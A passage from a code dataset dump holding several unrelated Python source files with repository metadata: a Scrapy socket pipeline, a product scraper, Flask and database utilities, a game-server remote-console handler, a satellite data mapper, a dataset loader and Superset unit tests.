220, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 223, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 236, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 253, "usage_type": "call"}, {"api_name": "stripe.Charge.create", "line_number": 259, "usage_type": "call"}, {"api_name": "stripe.Charge", "line_number": 259, "usage_type": "attribute"}, {"api_name": "stripe.error", "line_number": 265, "usage_type": "attribute"}, {"api_name": "django.shortcuts.redirect", "line_number": 272, "usage_type": "call"}, 
{"api_name": "django.shortcuts.redirect", "line_number": 279, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 281, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 289, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 295, "usage_type": "call"}]} +{"seq_id": "12082766115", "text": "# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n# wang:第一步 导入相应包\nimport os\nimport json\nfrom socket import *\nimport time\n#wang:第一步结束\nimport json\nimport codecs\n\n\nclass ZhuoboPipeline(object):\n def __init__(self):\n\n # wang:第二步 创建(如果不存在),或者直接打开追加日志文件 存放错误记录\n self.filename = open(\"F:/logs_of_scrapyserver/logs.txt\", \"a\")\n # wang:第二步结束\n\n # wang:第三步 进行连接初始化\n self.HOST = 'localhost' # 因为我是在同一台机器上运行,所以是localhost,不同主机的话,此处需要改成服务器地址\n self.PORT = 8880 # 主机端口\n self.BUFSIZ = 1024 # 缓冲区\n self.ADDR = (self.HOST, self.PORT)\n self.tcpCliSock = socket(AF_INET, SOCK_STREAM) # 客户端套接字\n\n connect = self.tcpCliSock.connect((self.HOST, self.PORT))\n # wang:第三步结束\n def process_item(self, item, spider):\n # wang:第四步 进行数据包装与传送\n text = json.dumps(dict(item), ensure_ascii=False)\n i_timessend = 0;\n while True:\n try:\n self.tcpCliSock.send(text.encode(\"ANSI\")) # 发送数据\n print(\"\\n发送成功\\n\")\n break\n except:\n if i_timessend >= 3:\n self.filename.write((\"Send \" + text + \" failed!\\nTime:\" + time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime(\n time.time()))))\n print(\"程序终止!原因:向数据库服务器三次发送数据失败!相关数据已记录在错误日志,路径为:\" + \"F:\\logs_of_scrapyserver\\logs.txt\")\n self.tcpCliSock.close()\n exit()\n i_timessend += 1;\n print(\"\\n开始等待数据反馈\\n\")\n recvdata = self.tcpCliSock.recv(15)\n if not recvdata: # 对方断开连接\n print(\"对方断开连接!\")\n self.tcpCliSock.close()\n if recvdata[0:7] != b'success':\n if recvdata[0:13] == b'data too long':\n self.filename.write((\n \"Send \" + text + \" Warning:the data your send is too long(more than 1024字符)!\\nTime:\" + time.strftime(\n '%Y-%m-%d %H:%M:%S',\n time.localtime(time.time()))))\n else:\n print(\"主机无法接收,主动断开连接!\")\n self.tcpCliSock.close()\n # wang:第四步 数据传送结束\n return item\n\n def close_spider(self, spider):\n self.filename.close()\n\n\n\n\n\n\n\n", "repo_name": "Wang-future/Jobs_Come", "sub_path": "code/数据爬取端/Zhuobo/Zhuobo/pipelines.py", "file_name": "pipelines.py", "file_ext": "py", "file_size_in_byte": 3023, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.dumps", "line_number": 35, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 44, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 45, "usage_type": "call"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 59, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 61, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "41792035335", "text": "import lxml.html\nimport json\n\n\nclass NikeVariants(object):\n\n def setupSC(self, response):\n \"\"\" Call it from SC spiders \"\"\"\n self.tree_html = lxml.html.fromstring(response.body)\n\n def setupCH(self, tree_html):\n \"\"\" Call it from CH spiders \"\"\"\n self.tree_html = tree_html\n\n def _find_between(self, s, first, last):\n try:\n start = s.index(first) + len(first)\n end = 
s.index(last, start)\n return s[start:end]\n except ValueError:\n return ""\n\n def _variants(self):\n try:\n product_json_text = self.tree_html.xpath(\n "//script[@id='product-data']/text()")[0]\n product_json = json.loads(product_json_text)\n except Exception as _:\n product_json = None\n\n variant_list = []\n\n if product_json and product_json["inStockColorways"]:\n for swatch in product_json["inStockColorways"]:\n variant_item = {}\n properties = {"color": swatch["colorDescription"]}\n variant_item["properties"] = properties\n variant_item["price"] = float(self.tree_html.xpath(\n "//meta[@property='og:price:amount']/@content")[0])\n variant_item["in_stock"] = True \\\n if swatch["status"] == "IN_STOCK" else False\n variant_item["url"] = swatch["url"]\n variant_item["selected"] = True \\\n if "pid-" + str(product_json["productId"]) \\\n in swatch["url"] else False\n variant_list.append(variant_item)\n\n if variant_list:\n return variant_list\n\n return None\n", "repo_name": "aprosdev/ecom-predictor", "sub_path": "spiders_shared_code/nike_variants.py", "file_name": "nike_variants.py", "file_ext": "py", "file_size_in_byte": 1691, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "lxml.html.html.fromstring", "line_number": 9, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 9, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 9, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "70130663554", "text": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Author: leeyoshinari\r\nimport time\r\nimport traceback\r\nimport pymysql\r\nfrom common.config import getServer\r\nfrom common.logger import logger\r\n\r\n\r\nclass Schedule:\r\n def __init__(self):\r\n self.con = None\r\n self.cursor = None\r\n self.res = None\r\n\r\n self.sql = "select a.id, b.hash from (select max(id) id, answer_id from simple_answer where hash is not null " \\\r\n "and update_time > '{}' group by answer_id) a left join simple_answer b on a.id = b.id"\r\n\r\n def connect(self):\r\n self.con = pymysql.connect(host=getServer('db_host'), user=getServer('db_user'), port=int(getServer('db_port')),\r\n password=getServer('db_pwd'), database=getServer('db_name'))\r\n self.cursor = self.con.cursor()\r\n\r\n def get_result(self):\r\n try:\r\n self.connect()\r\n self.cursor.execute(self.sql.format(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time()-8640000))))\r\n self.res = self.cursor.fetchall()\r\n except:\r\n logger.error(traceback.format_exc())\r\n del self.cursor, self.con\r\n", "repo_name": "leeyoshinari/image_video", "sub_path": "common/scheduler.py", "file_name": "scheduler.py", "file_ext": "py", "file_size_in_byte": 1169, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymysql.connect", "line_number": 21, "usage_type": "call"}, {"api_name": "common.config.getServer", "line_number": 21, "usage_type": "call"}, {"api_name": "common.config.getServer", "line_number": 22, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 28, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "common.logger.logger.error", "line_number": 31, "usage_type": "call"}, {"api_name": "common.logger.logger", "line_number": 
31, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "2962415198", "text": "from flask import request\n\nfrom app.api_docs.v1 import article as api_doc\nfrom app.libs.error_code import Success\nfrom app.libs.redprint import RedPrint\nfrom app.models.article import Article\nfrom app.validators.forms import PaginateValidator\n\napi = RedPrint(name='article', description='Article', api_doc=api_doc)\n\n\n@api.route('/upload_and_parse_url', methods=['POST'])\n@api.doc()\ndef upload_and_parse_url():\n request_body = request.get_json()\n # user_id = request_body['user_id']\n editorial_topic_id = request_body['editorial_topic_id']\n target_url = request_body['target_url']\n linked_editorial_topic = Article.upload_and_parse_url(\n editorial_topic_id=editorial_topic_id,\n target_url=target_url)\n return Success(linked_editorial_topic)\n\n\n@api.route('/create_article', methods=['POST'])\n@api.doc()\ndef create_article():\n request_body = request.get_json()\n # user_id = request_body['user_id']\n editorial_topic_id = request_body['editorial_topic_id']\n article_id = request_body['article_id']\n linked_editorial_topic = Article.create_article(\n editorial_topic_id=editorial_topic_id,\n article_id=article_id)\n return Success(linked_editorial_topic)\n\n\n@api.route('/delete_tag_from_article', methods=['POST'])\n@api.doc()\ndef delete_tag_from_article():\n request_body = request.get_json()\n # user_id = request_body['user_id']\n article_id = request_body['article_id']\n article_tags = request_body['article_tags']\n article = Article.delete_tag_from_article(\n article_id=article_id,\n article_tags=article_tags)\n return Success(article)\n\n\n@api.route('/edit_article_importance', methods=['POST'])\n@api.doc()\ndef edit_article_importance():\n request_body = request.get_json()\n # user_id = request_body['user_id']\n article_id = request_body['article_id']\n article_importance = request_body['article_importance']\n article = Article.edit_article_importance(\n article_id=article_id,\n article_importance=article_importance)\n return Success(article)\n", "repo_name": "Piiiiiii/SQLAlchemy-Flask-Swagger", "sub_path": "app/api/v1/article.py", "file_name": "article.py", "file_ext": "py", "file_size_in_byte": 2059, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "app.libs.redprint.RedPrint", "line_number": 9, "usage_type": "call"}, {"api_name": "app.api_docs.v1.article", "line_number": 9, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "app.models.article.Article.upload_and_parse_url", "line_number": 19, "usage_type": "call"}, {"api_name": "app.models.article.Article", "line_number": 19, "usage_type": "name"}, {"api_name": "app.libs.error_code.Success", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "app.models.article.Article.create_article", "line_number": 32, "usage_type": "call"}, {"api_name": "app.models.article.Article", "line_number": 32, "usage_type": "name"}, {"api_name": "app.libs.error_code.Success", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request", 
"line_number": 41, "usage_type": "name"}, {"api_name": "app.models.article.Article.delete_tag_from_article", "line_number": 45, "usage_type": "call"}, {"api_name": "app.models.article.Article", "line_number": 45, "usage_type": "name"}, {"api_name": "app.libs.error_code.Success", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "app.models.article.Article.edit_article_importance", "line_number": 58, "usage_type": "call"}, {"api_name": "app.models.article.Article", "line_number": 58, "usage_type": "name"}, {"api_name": "app.libs.error_code.Success", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "18750025261", "text": "\"\"\"Webrequest routines\"\"\"\r\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\r\nfrom urllib.parse import parse_qs\r\nfrom socketserver import ThreadingMixIn\r\nimport time\r\n\r\n\r\nclass Serv(BaseHTTPRequestHandler):\r\n \"\"\"Class Serv\"\"\"\r\n\r\n def do_GET(self):\r\n \"\"\"Handle Get Requests\"\"\"\r\n\r\n client = self.client_address[0]\r\n if client not in self.server.srvhandler.servers:\r\n response = \"you fool\"\r\n self._send_response(response)\r\n print(\"WARNING! Refused connection from \" + client)\r\n return\r\n if self.path == \"/load\":\r\n response = self.server.srvhandler.get_header()\r\n self._send_response(response)\r\n return\r\n\r\n self.server.srvhandler.set_server_time(client, time.time())\r\n\r\n queue = self.server.srvhandler.servers[client]\r\n queue_author = self.server.srvhandler.queue_author[client]\r\n if len(queue) > 0 and len(queue_author) > 0:\r\n\r\n data = queue[0]\r\n cmd, arg = data\r\n\r\n queue_author = self.server.srvhandler.queue_author[client][0]\r\n\r\n if cmd == \"/rcon\":\r\n arg = \"game.ConsoleCommand[[\" + arg + \"\\n]]\"\r\n sent_header = self.server.srvhandler.get_sent_header()\r\n arg = sent_header.replace(\"{USERID}\", str(queue_author)) + arg\r\n arg = arg + \"\\nprint('Message recieved')\\n\"\r\n\r\n print(str(client) + \" << \" + cmd + \" \" + arg)\r\n\r\n response = arg\r\n print(self.server.srvhandler.queue_author[client])\r\n try:\r\n self.server.srvhandler.queue_author[client].pop(0)\r\n self.server.srvhandler.servers[client].pop(0)\r\n except Exception as e:\r\n print(str(e))\r\n else:\r\n response = \"local x = nil\"\r\n self._send_response(response)\r\n\r\n def do_POST(self):\r\n \"\"\"Handle POST Requests\"\"\"\r\n client = self.client_address[0]\r\n if client not in self.server.srvhandler.servers:\r\n print(\"WARNING! 
Refused POST connection from " + client)\r\n else:\r\n content_length = int(self.headers['Content-Length'])\r\n post_data = self.rfile.read(content_length)\r\n params = parse_qs(post_data.decode())\r\n try:\r\n if params['message'][0]:\r\n try:\r\n if params['uid'][0]:\r\n self.server.tg.send(\r\n params['uid'][0],\r\n str(client) + " >> " + params['message'][0])\r\n except Exception:\r\n print("No client ID, receiving to main\\n")\r\n print(str(client) + " >> " + params['message'][0])\r\n else:\r\n print("Invalid postdata from " + str(client))\r\n except Exception:\r\n print("[exception] Invalid postdata from " + str(client))\r\n self.send_response(200)\r\n self.end_headers()\r\n\r\n def log_message(self, format, *args):\r\n """Suppress connection logs."""\r\n pass\r\n\r\n def _send_response(self, response):\r\n """Send response"""\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/html; charset=utf-8')\r\n self.end_headers()\r\n self.wfile.write(bytes(response, 'utf-8'))\r\n\r\n\r\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\r\n """Handle requests in a separate thread."""\r\n\r\n def __init__(self, server_address, handler, handler_class=Serv):\r\n super().__init__(server_address, handler_class)\r\n self.srvhandler = handler\r\n\r\n def init_tg(self, handler):\r\n self.tg = handler\r\n", "repo_name": "zuknes/GmodRemoteTelegram", "sub_path": "request_handler.py", "file_name": "request_handler.py", "file_ext": "py", "file_size_in_byte": 3719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "http.server.BaseHTTPRequestHandler", "line_number": 8, "usage_type": "name"}, {"api_name": "time.time", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.parse.parse_qs", "line_number": 63, "usage_type": "call"}, {"api_name": "socketserver.ThreadingMixIn", "line_number": 93, "usage_type": "name"}, {"api_name": "http.server.HTTPServer", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "33342255758", "text": "# Name: mapper_amsr2_l1r\n# Purpose: Mapping for AMSR-2 L1R data\n# Authors: Anton Korosov\n# Licence: This file is part of NANSAT. 
You can redistribute it or modify\n# under the terms of GNU General Public License, v.3\n# http://www.gnu.org/licenses/gpl-3.0.html\nimport os\nfrom datetime import datetime, timedelta\nfrom math import ceil\nimport json\n\nimport pythesint as pti\n\nfrom nansat.utils import gdal, ogr, parse_time\nfrom nansat.exceptions import WrongMapperError\nfrom nansat.vrt import VRT\nfrom nansat.nsr import NSR\n\n\nclass Mapper(VRT):\n ''' Mapper for AMSR-2 L1 data\n\n '''\n\n def __init__(self, filename, gdalDataset, gdalMetadata,\n GCP_STEP=20, MAX_LAT=90, MIN_LAT=50, resolution='low',\n **kwargs):\n ''' Create VRT\n Parameters\n ----------\n GCP_STEP : int\n step between GCPs along each dimension\n '''\n ifile = os.path.split(filename)[1]\n if not ifile.startswith('GW1AM2_') or not ifile.endswith('.h5'):\n raise WrongMapperError\n try:\n ProductName = gdalMetadata['ProductName']\n PlatformShortName = gdalMetadata['PlatformShortName']\n SensorShortName = gdalMetadata['SensorShortName']\n except:\n raise WrongMapperError\n\n if (not ProductName == 'AMSR2-L1R' or\n not PlatformShortName == 'GCOM-W1' or\n not SensorShortName == 'AMSR2'):\n raise WrongMapperError\n\n if resolution == 'low':\n subDatasetWidth = 243\n else:\n subDatasetWidth = 486\n\n # get GCPs from lon/lat grids\n latGrid = gdal.Open('HDF5:"%s"://Latitude_of_Observation_Point_for_89A' % filename).ReadAsArray()\n lonGrid = gdal.Open('HDF5:"%s"://Longitude_of_Observation_Point_for_89A' % filename).ReadAsArray()\n if subDatasetWidth == 243:\n latGrid = latGrid[:, ::2]\n lonGrid = lonGrid[:, ::2]\n\n dx = .5\n dy = .5\n gcps = []\n k = 0\n maxY = 0\n minY = latGrid.shape[0]\n for i0 in range(0, latGrid.shape[0], GCP_STEP):\n for i1 in range(0, latGrid.shape[1], GCP_STEP):\n # create GCP with X,Y,pixel,line from lat/lon matrices\n lon = float(lonGrid[i0, i1])\n lat = float(latGrid[i0, i1])\n if (lon >= -180 and\n lon <= 180 and\n lat >= MIN_LAT and\n lat <= MAX_LAT):\n gcp = gdal.GCP(lon, lat, 0, i1 + dx, i0 + dy)\n gcps.append(gcp)\n k += 1\n maxY = max(maxY, i0)\n minY = min(minY, i0)\n yOff = minY\n ySize = maxY - minY\n\n # remove Y-offset from gcps\n for gcp in gcps:\n gcp.GCPLine -= yOff\n\n metaDict = []\n\n subDatasets = gdalDataset.GetSubDatasets()\n metadata = gdalDataset.GetMetadata()\n for subDataset in subDatasets:\n # select subdatasets for that resolution (width)\n if (subDatasetWidth == int(subDataset[1].split(']')[0].split('x')[-1]) and\n 'Latitude' not in subDataset[0] and 'Longitude' not in subDataset[0]):\n name = subDataset[0].split('/')[-1]\n # find scale\n scale = 1\n for meta in metadata:\n if name + '_SCALE' in meta:\n scale = float(metadata[meta])\n # create meta entry\n metaEntry = {'src': {'SourceFilename': subDataset[0],\n 'sourceBand': 1,\n 'ScaleRatio': scale,\n 'ScaleOffset': 0,\n 'yOff': yOff,\n 'ySize': ySize,},\n 'dst': {'name': name}\n }\n metaDict.append(metaEntry)\n\n # create VRT from one of the subdatasets\n gdalSubDataset = gdal.Open(metaEntry['src']['SourceFilename'])\n self._init_from_dataset_params(subDatasetWidth, ySize, (1,0,0,ySize,0,-1), NSR().wkt)\n # add bands with metadata and corresponding values to the empty VRT\n self.create_bands(metaDict)\n\n self.dataset.SetMetadataItem('time_coverage_start',\n parse_time(gdalMetadata['ObservationStartDateTime']).isoformat())\n self.dataset.SetMetadataItem('time_coverage_end',\n parse_time(gdalMetadata['ObservationEndDateTime']).isoformat())\n # append GCPs and lat/lon projection to the vsiDataset\n self.dataset.SetGCPs(gcps, NSR().wkt)\n 
self.reproject_gcps('+proj=stere +datum=WGS84 +ellps=WGS84 +lat_0=90 +lon_0=0 +no_defs')\n self.tps = True\n\n mm = pti.get_gcmd_instrument('AMSR2')\n ee = pti.get_gcmd_platform('GCOM-W1')\n self.dataset.SetMetadataItem('instrument', json.dumps(mm))\n self.dataset.SetMetadataItem('platform', json.dumps(ee))\n", "repo_name": "nansencenter/nansat", "sub_path": "nansat/mappers/mapper_amsr2_l1r.py", "file_name": "mapper_amsr2_l1r.py", "file_ext": "py", "file_size_in_byte": 5111, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 170, "dataset": "github-code", "pt": "61", "api": [{"api_name": "nansat.vrt.VRT", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "nansat.exceptions.WrongMapperError", "line_number": 36, "usage_type": "name"}, {"api_name": "nansat.exceptions.WrongMapperError", "line_number": 42, "usage_type": "name"}, {"api_name": "nansat.exceptions.WrongMapperError", "line_number": 47, "usage_type": "name"}, {"api_name": "nansat.utils.gdal.Open", "line_number": 55, "usage_type": "call"}, {"api_name": "nansat.utils.gdal", "line_number": 55, "usage_type": "name"}, {"api_name": "nansat.utils.gdal.Open", "line_number": 56, "usage_type": "call"}, {"api_name": "nansat.utils.gdal", "line_number": 56, "usage_type": "name"}, {"api_name": "nansat.utils.gdal.GCP", "line_number": 76, "usage_type": "call"}, {"api_name": "nansat.utils.gdal", "line_number": 76, "usage_type": "name"}, {"api_name": "nansat.utils.gdal.Open", "line_number": 114, "usage_type": "call"}, {"api_name": "nansat.utils.gdal", "line_number": 114, "usage_type": "name"}, {"api_name": "nansat.nsr.NSR", "line_number": 115, "usage_type": "call"}, {"api_name": "nansat.utils.parse_time", "line_number": 120, "usage_type": "call"}, {"api_name": "nansat.utils.parse_time", "line_number": 122, "usage_type": "call"}, {"api_name": "nansat.nsr.NSR", "line_number": 124, "usage_type": "call"}, {"api_name": "pythesint.get_gcmd_instrument", "line_number": 128, "usage_type": "call"}, {"api_name": "pythesint.get_gcmd_platform", "line_number": 129, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 130, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "41336209455", "text": "from os.path import join\nimport torch.utils.data\nfrom collections import OrderedDict\nfrom smart_open import open as sopen # Better alternative to Python open().\n\nfrom file_utils import File_Util\nfrom logger import logger\nfrom config import configuration as config\nfrom config import platform as plat\nfrom config import username as user\n\nseed_val = 0\n\n\nclass JSONLoader(torch.utils.data.Dataset):\n \"\"\"\n Class to process and load json files from data directory.\n\n Datasets: AmazonCat-14K\n\n txts : Amazon products title + description after parsing and cleaning.\n txts = {\"id1\": \"azn_ttl_1\", \"id2\": \"azn_ttl_2\"}\n\n sample2cats : OrderedDict of id to sample2cats.\n sample2cats = {\"id1\": [class_id_1,class_id_2],\"id2\": [class_id_2,class_id_10]}\n\n cattext2catid_map : Dict of class texts.\n cattext2catid_map = {\"Computer Science\":class_id_1, \"Machine Learning\":class_id_2}\n\n samples : {\n \"txts\":\"\",\n \"sample2cats\":\"\"\n }\n \"\"\"\n\n def __init__(self, dataset_name=config[\"data\"][\"dataset_name\"], dataset_dir: str = config[\"paths\"][\"dataset_dir\"][plat][user]):\n \"\"\"\n Initializes the JSON loader.\n\n 
Args:\n dataset_dir : Path to directory of the dataset.\n dataset_name : Name of the dataset.\n \"\"\"\n super(JSONLoader, self).__init__()\n self.dataset_name = dataset_name\n self.dataset_dir = join(dataset_dir, self.dataset_name)\n self.raw_json_dir = join(self.dataset_dir, self.dataset_name + \"_RawData\")\n self.raw_json_file = self.dataset_name + \"_RawData.json\"\n logger.info(\"Dataset name: [{}], Directory: [{}]\".format(self.dataset_name, self.dataset_dir))\n self.txts, self.classes, self.cats = self.gen_dicts(json_path=join(self.raw_json_dir,self.raw_json_file), encoding=\"UTF-8\")\n\n def gen_dicts(self,json_path=None, encoding=config[\"text_process\"][\"encoding\"],specials=\"\"\"_-@*#'\"/\\\\\"\"\", replace=' '):\n \"\"\"\n Generates the data dictionaries from the original json file.\n\n :param replace: Character to replace with.\n :param specials: Characters to clean from txts.\n :param json_path: Path to raw json file.\n :param encoding: Encoding for the raw json file.\n :return: txts, classes (sample2cats), cats (cattext2catid_map).\n no_cat_ids (ids for which no categories were found) are saved to disk, not returned.\n \"\"\"\n import ast # As the data is not proper JSON (single-quote instead of double-quote) format, \"json\" library will not work.\n from unidecode import unidecode\n\n logger.info(\"Generates the data dictionaries from original json file.\")\n txts = OrderedDict()\n classes = OrderedDict()\n cats = OrderedDict()\n no_cat_ids = [] # To store ids for which no cats were found.\n\n if json_path is None: json_path = self.raw_json_dir\n with sopen(json_path, encoding=encoding) as raw_json_ptr:\n trans_table = File_Util.make_trans_table(specials=specials,replace=replace) # Creating mapping to clean txts.\n cat_idx = 0 # Holds the category index.\n for cnt, line in enumerate(raw_json_ptr):\n # Instead of: line_dict = OrderedDict(json.loads(line));\n # Use: import ast; line_dict = ast.literal_eval(line.strip().replace('\\n','\\\\n'));\n line_dict = ast.literal_eval(line.strip().replace('\\n','\\\\n'))\n if \"categories\" in line_dict: # Check if \"categories\" exists.\n if \"title\" in line_dict: # Check if \"title\" exists, add if True.\n txts[line_dict[\"asin\"]] = unidecode(str(line_dict[\"title\"])).translate(trans_table)\n if \"description\" in line_dict: # Check if \"description\" exists and append to \"title\" with keyword: \". \\nDESC: \", if true.\n txts[line_dict[\"asin\"]] = txts[line_dict[\"asin\"]] + \". \\nDESC: \" + unidecode(str(line_dict[\"description\"])).translate(trans_table)\n else:\n if \"description\" in line_dict: # Check if \"description\" exists even though \"title\" does not, use only \"description\" if true.\n txts[line_dict[\"asin\"]] = \". \\nDESC: \" + line_dict[\"description\"]\n else: # Report and skip the sample if neither \"title\" nor \"description\" exists.\n logger.warning(\"Neither 'title' nor 'description' found for sample id: [{}]. Adding sample to 'no_cat_ids'.\".format(line_dict[\"asin\"]))\n no_cat_ids.append(line_dict[\"asin\"]) # As neither \"title\" nor \"description\" exists, adding the id to \"no_cat_ids\".\n continue\n classes[line_dict[\"asin\"]] = line_dict[\"categories\"][0]\n for lbl in classes[line_dict[\"asin\"]]:\n if lbl not in cats: # If lbl does not exist in cats already, add it and assign a new category index.\n cats[lbl] = cat_idx\n cat_idx += 1\n classes[line_dict[\"asin\"]][classes[line_dict[\"asin\"]].index(lbl)] = cats[lbl] # Replace the category text with its category id.\n else: # if \"categories\" does not exist, then add the id to \"no_cat_ids\".\n no_cat_ids.append(line_dict[\"asin\"])\n\n
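 # Illustrative shapes of the resulting dicts (added note; ids and labels are made up):\n # txts = {\"B0001\": \"Some title. \\nDESC: some description\"}\n # classes = {\"B0001\": [0, 1]} (sample id -> category ids)\n # cats = {\"Books\": 0, \"Fiction\": 1} (category text -> category id)\n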
 File_Util.save_json(no_cat_ids,self.dataset_name + \"_no_cat_ids\",filepath=self.dataset_dir)\n logger.info(\"Number of txts: [{}], sample2cats: [{}] and cattext2catid_map: [{}].\"\n .format(len(txts),len(classes),len(cats)))\n return txts, classes, cats\n\n def get_data(self):\n \"\"\"\n Function to get the entire dataset\n \"\"\"\n return self.txts, self.classes, self.cats\n\n def get_txts(self):\n \"\"\"\n Function to get the entire set of features\n \"\"\"\n return self.txts\n\n def get_classes(self):\n \"\"\"\n Function to get the entire set of sample2cats.\n \"\"\"\n return self.classes\n\n def get_cats(self) -> dict:\n \"\"\"\n Function to get the entire set of cattext2catid_map\n \"\"\"\n return self.cats\n\n\ndef main():\n # config = read_config(args)\n cls = JSONLoader()\n cats_val = cls.get_cats()\n logger.print_dict(cats_val)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "SamujjwalSam/XC_GCN", "sub_path": "data_loaders/json_loader.py", "file_name": "json_loader.py", "file_ext": "py", "file_size_in_byte": 6333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.utils.data.utils", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 15, "usage_type": "name"}, {"api_name": "config.configuration", "line_number": 36, "usage_type": "name"}, {"api_name": "config.platform", "line_number": 36, "usage_type": "name"}, {"api_name": "config.username", "line_number": 36, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "logger.logger.info", "line_number": 49, "usage_type": "call"}, {"api_name": "logger.logger", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "config.configuration", "line_number": 52, "usage_type": "name"}, {"api_name": "logger.logger.info", "line_number": 66, "usage_type": "call"}, {"api_name": "logger.logger", "line_number": 66, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 67, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 68, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 69, "usage_type": "call"}, {"api_name": "smart_open.open", "line_number": 73, "usage_type": "call"}, {"api_name": "file_utils.File_Util.make_trans_table", "line_number": 74, "usage_type": "call"}, {"api_name": "file_utils.File_Util", "line_number": 74, "usage_type": "name"}, {"api_name": "ast.literal_eval", "line_number": 79, "usage_type": "call"}, {"api_name": "unidecode.unidecode", "line_number": 82, "usage_type": "call"}, {"api_name": "unidecode.unidecode", "line_number": 84, "usage_type": 
"call"}, {"api_name": "logger.logger.warning", "line_number": 89, "usage_type": "call"}, {"api_name": "logger.logger", "line_number": 89, "usage_type": "name"}, {"api_name": "file_utils.File_Util.save_json", "line_number": 101, "usage_type": "call"}, {"api_name": "file_utils.File_Util", "line_number": 101, "usage_type": "name"}, {"api_name": "logger.logger.info", "line_number": 102, "usage_type": "call"}, {"api_name": "logger.logger", "line_number": 102, "usage_type": "name"}, {"api_name": "{'ast': 'ast', 'unidecode': 'unidecode.unidecode'}", "line_number": 133, "usage_type": "call"}, {"api_name": "logger.logger.print_dict", "line_number": 135, "usage_type": "call"}, {"api_name": "logger.logger", "line_number": 135, "usage_type": "name"}]} +{"seq_id": "25169164135", "text": "from textwrap import dedent\nfrom typing import Any, Optional\n\nimport pytest\nfrom sqlalchemy import types\n\nfrom superset.superset_typing import ResultSetColumnType, SQLAColumnType\nfrom superset.utils.core import GenericDataType\nfrom tests.unit_tests.db_engine_specs.utils import assert_column_spec\n\n\ndef test_get_text_clause_with_colon() -> None:\n \"\"\"\n Make sure text clauses are correctly escaped\n \"\"\"\n\n from superset.db_engine_specs.base import BaseEngineSpec\n\n text_clause = BaseEngineSpec.get_text_clause(\n \"SELECT foo FROM tbl WHERE foo = '123:456')\"\n )\n assert text_clause.text == \"SELECT foo FROM tbl WHERE foo = '123\\\\:456')\"\n\n\ndef test_parse_sql_single_statement() -> None:\n \"\"\"\n `parse_sql` should properly strip leading and trailing spaces and semicolons\n \"\"\"\n\n from superset.db_engine_specs.base import BaseEngineSpec\n\n queries = BaseEngineSpec.parse_sql(\" SELECT foo FROM tbl ; \")\n assert queries == [\"SELECT foo 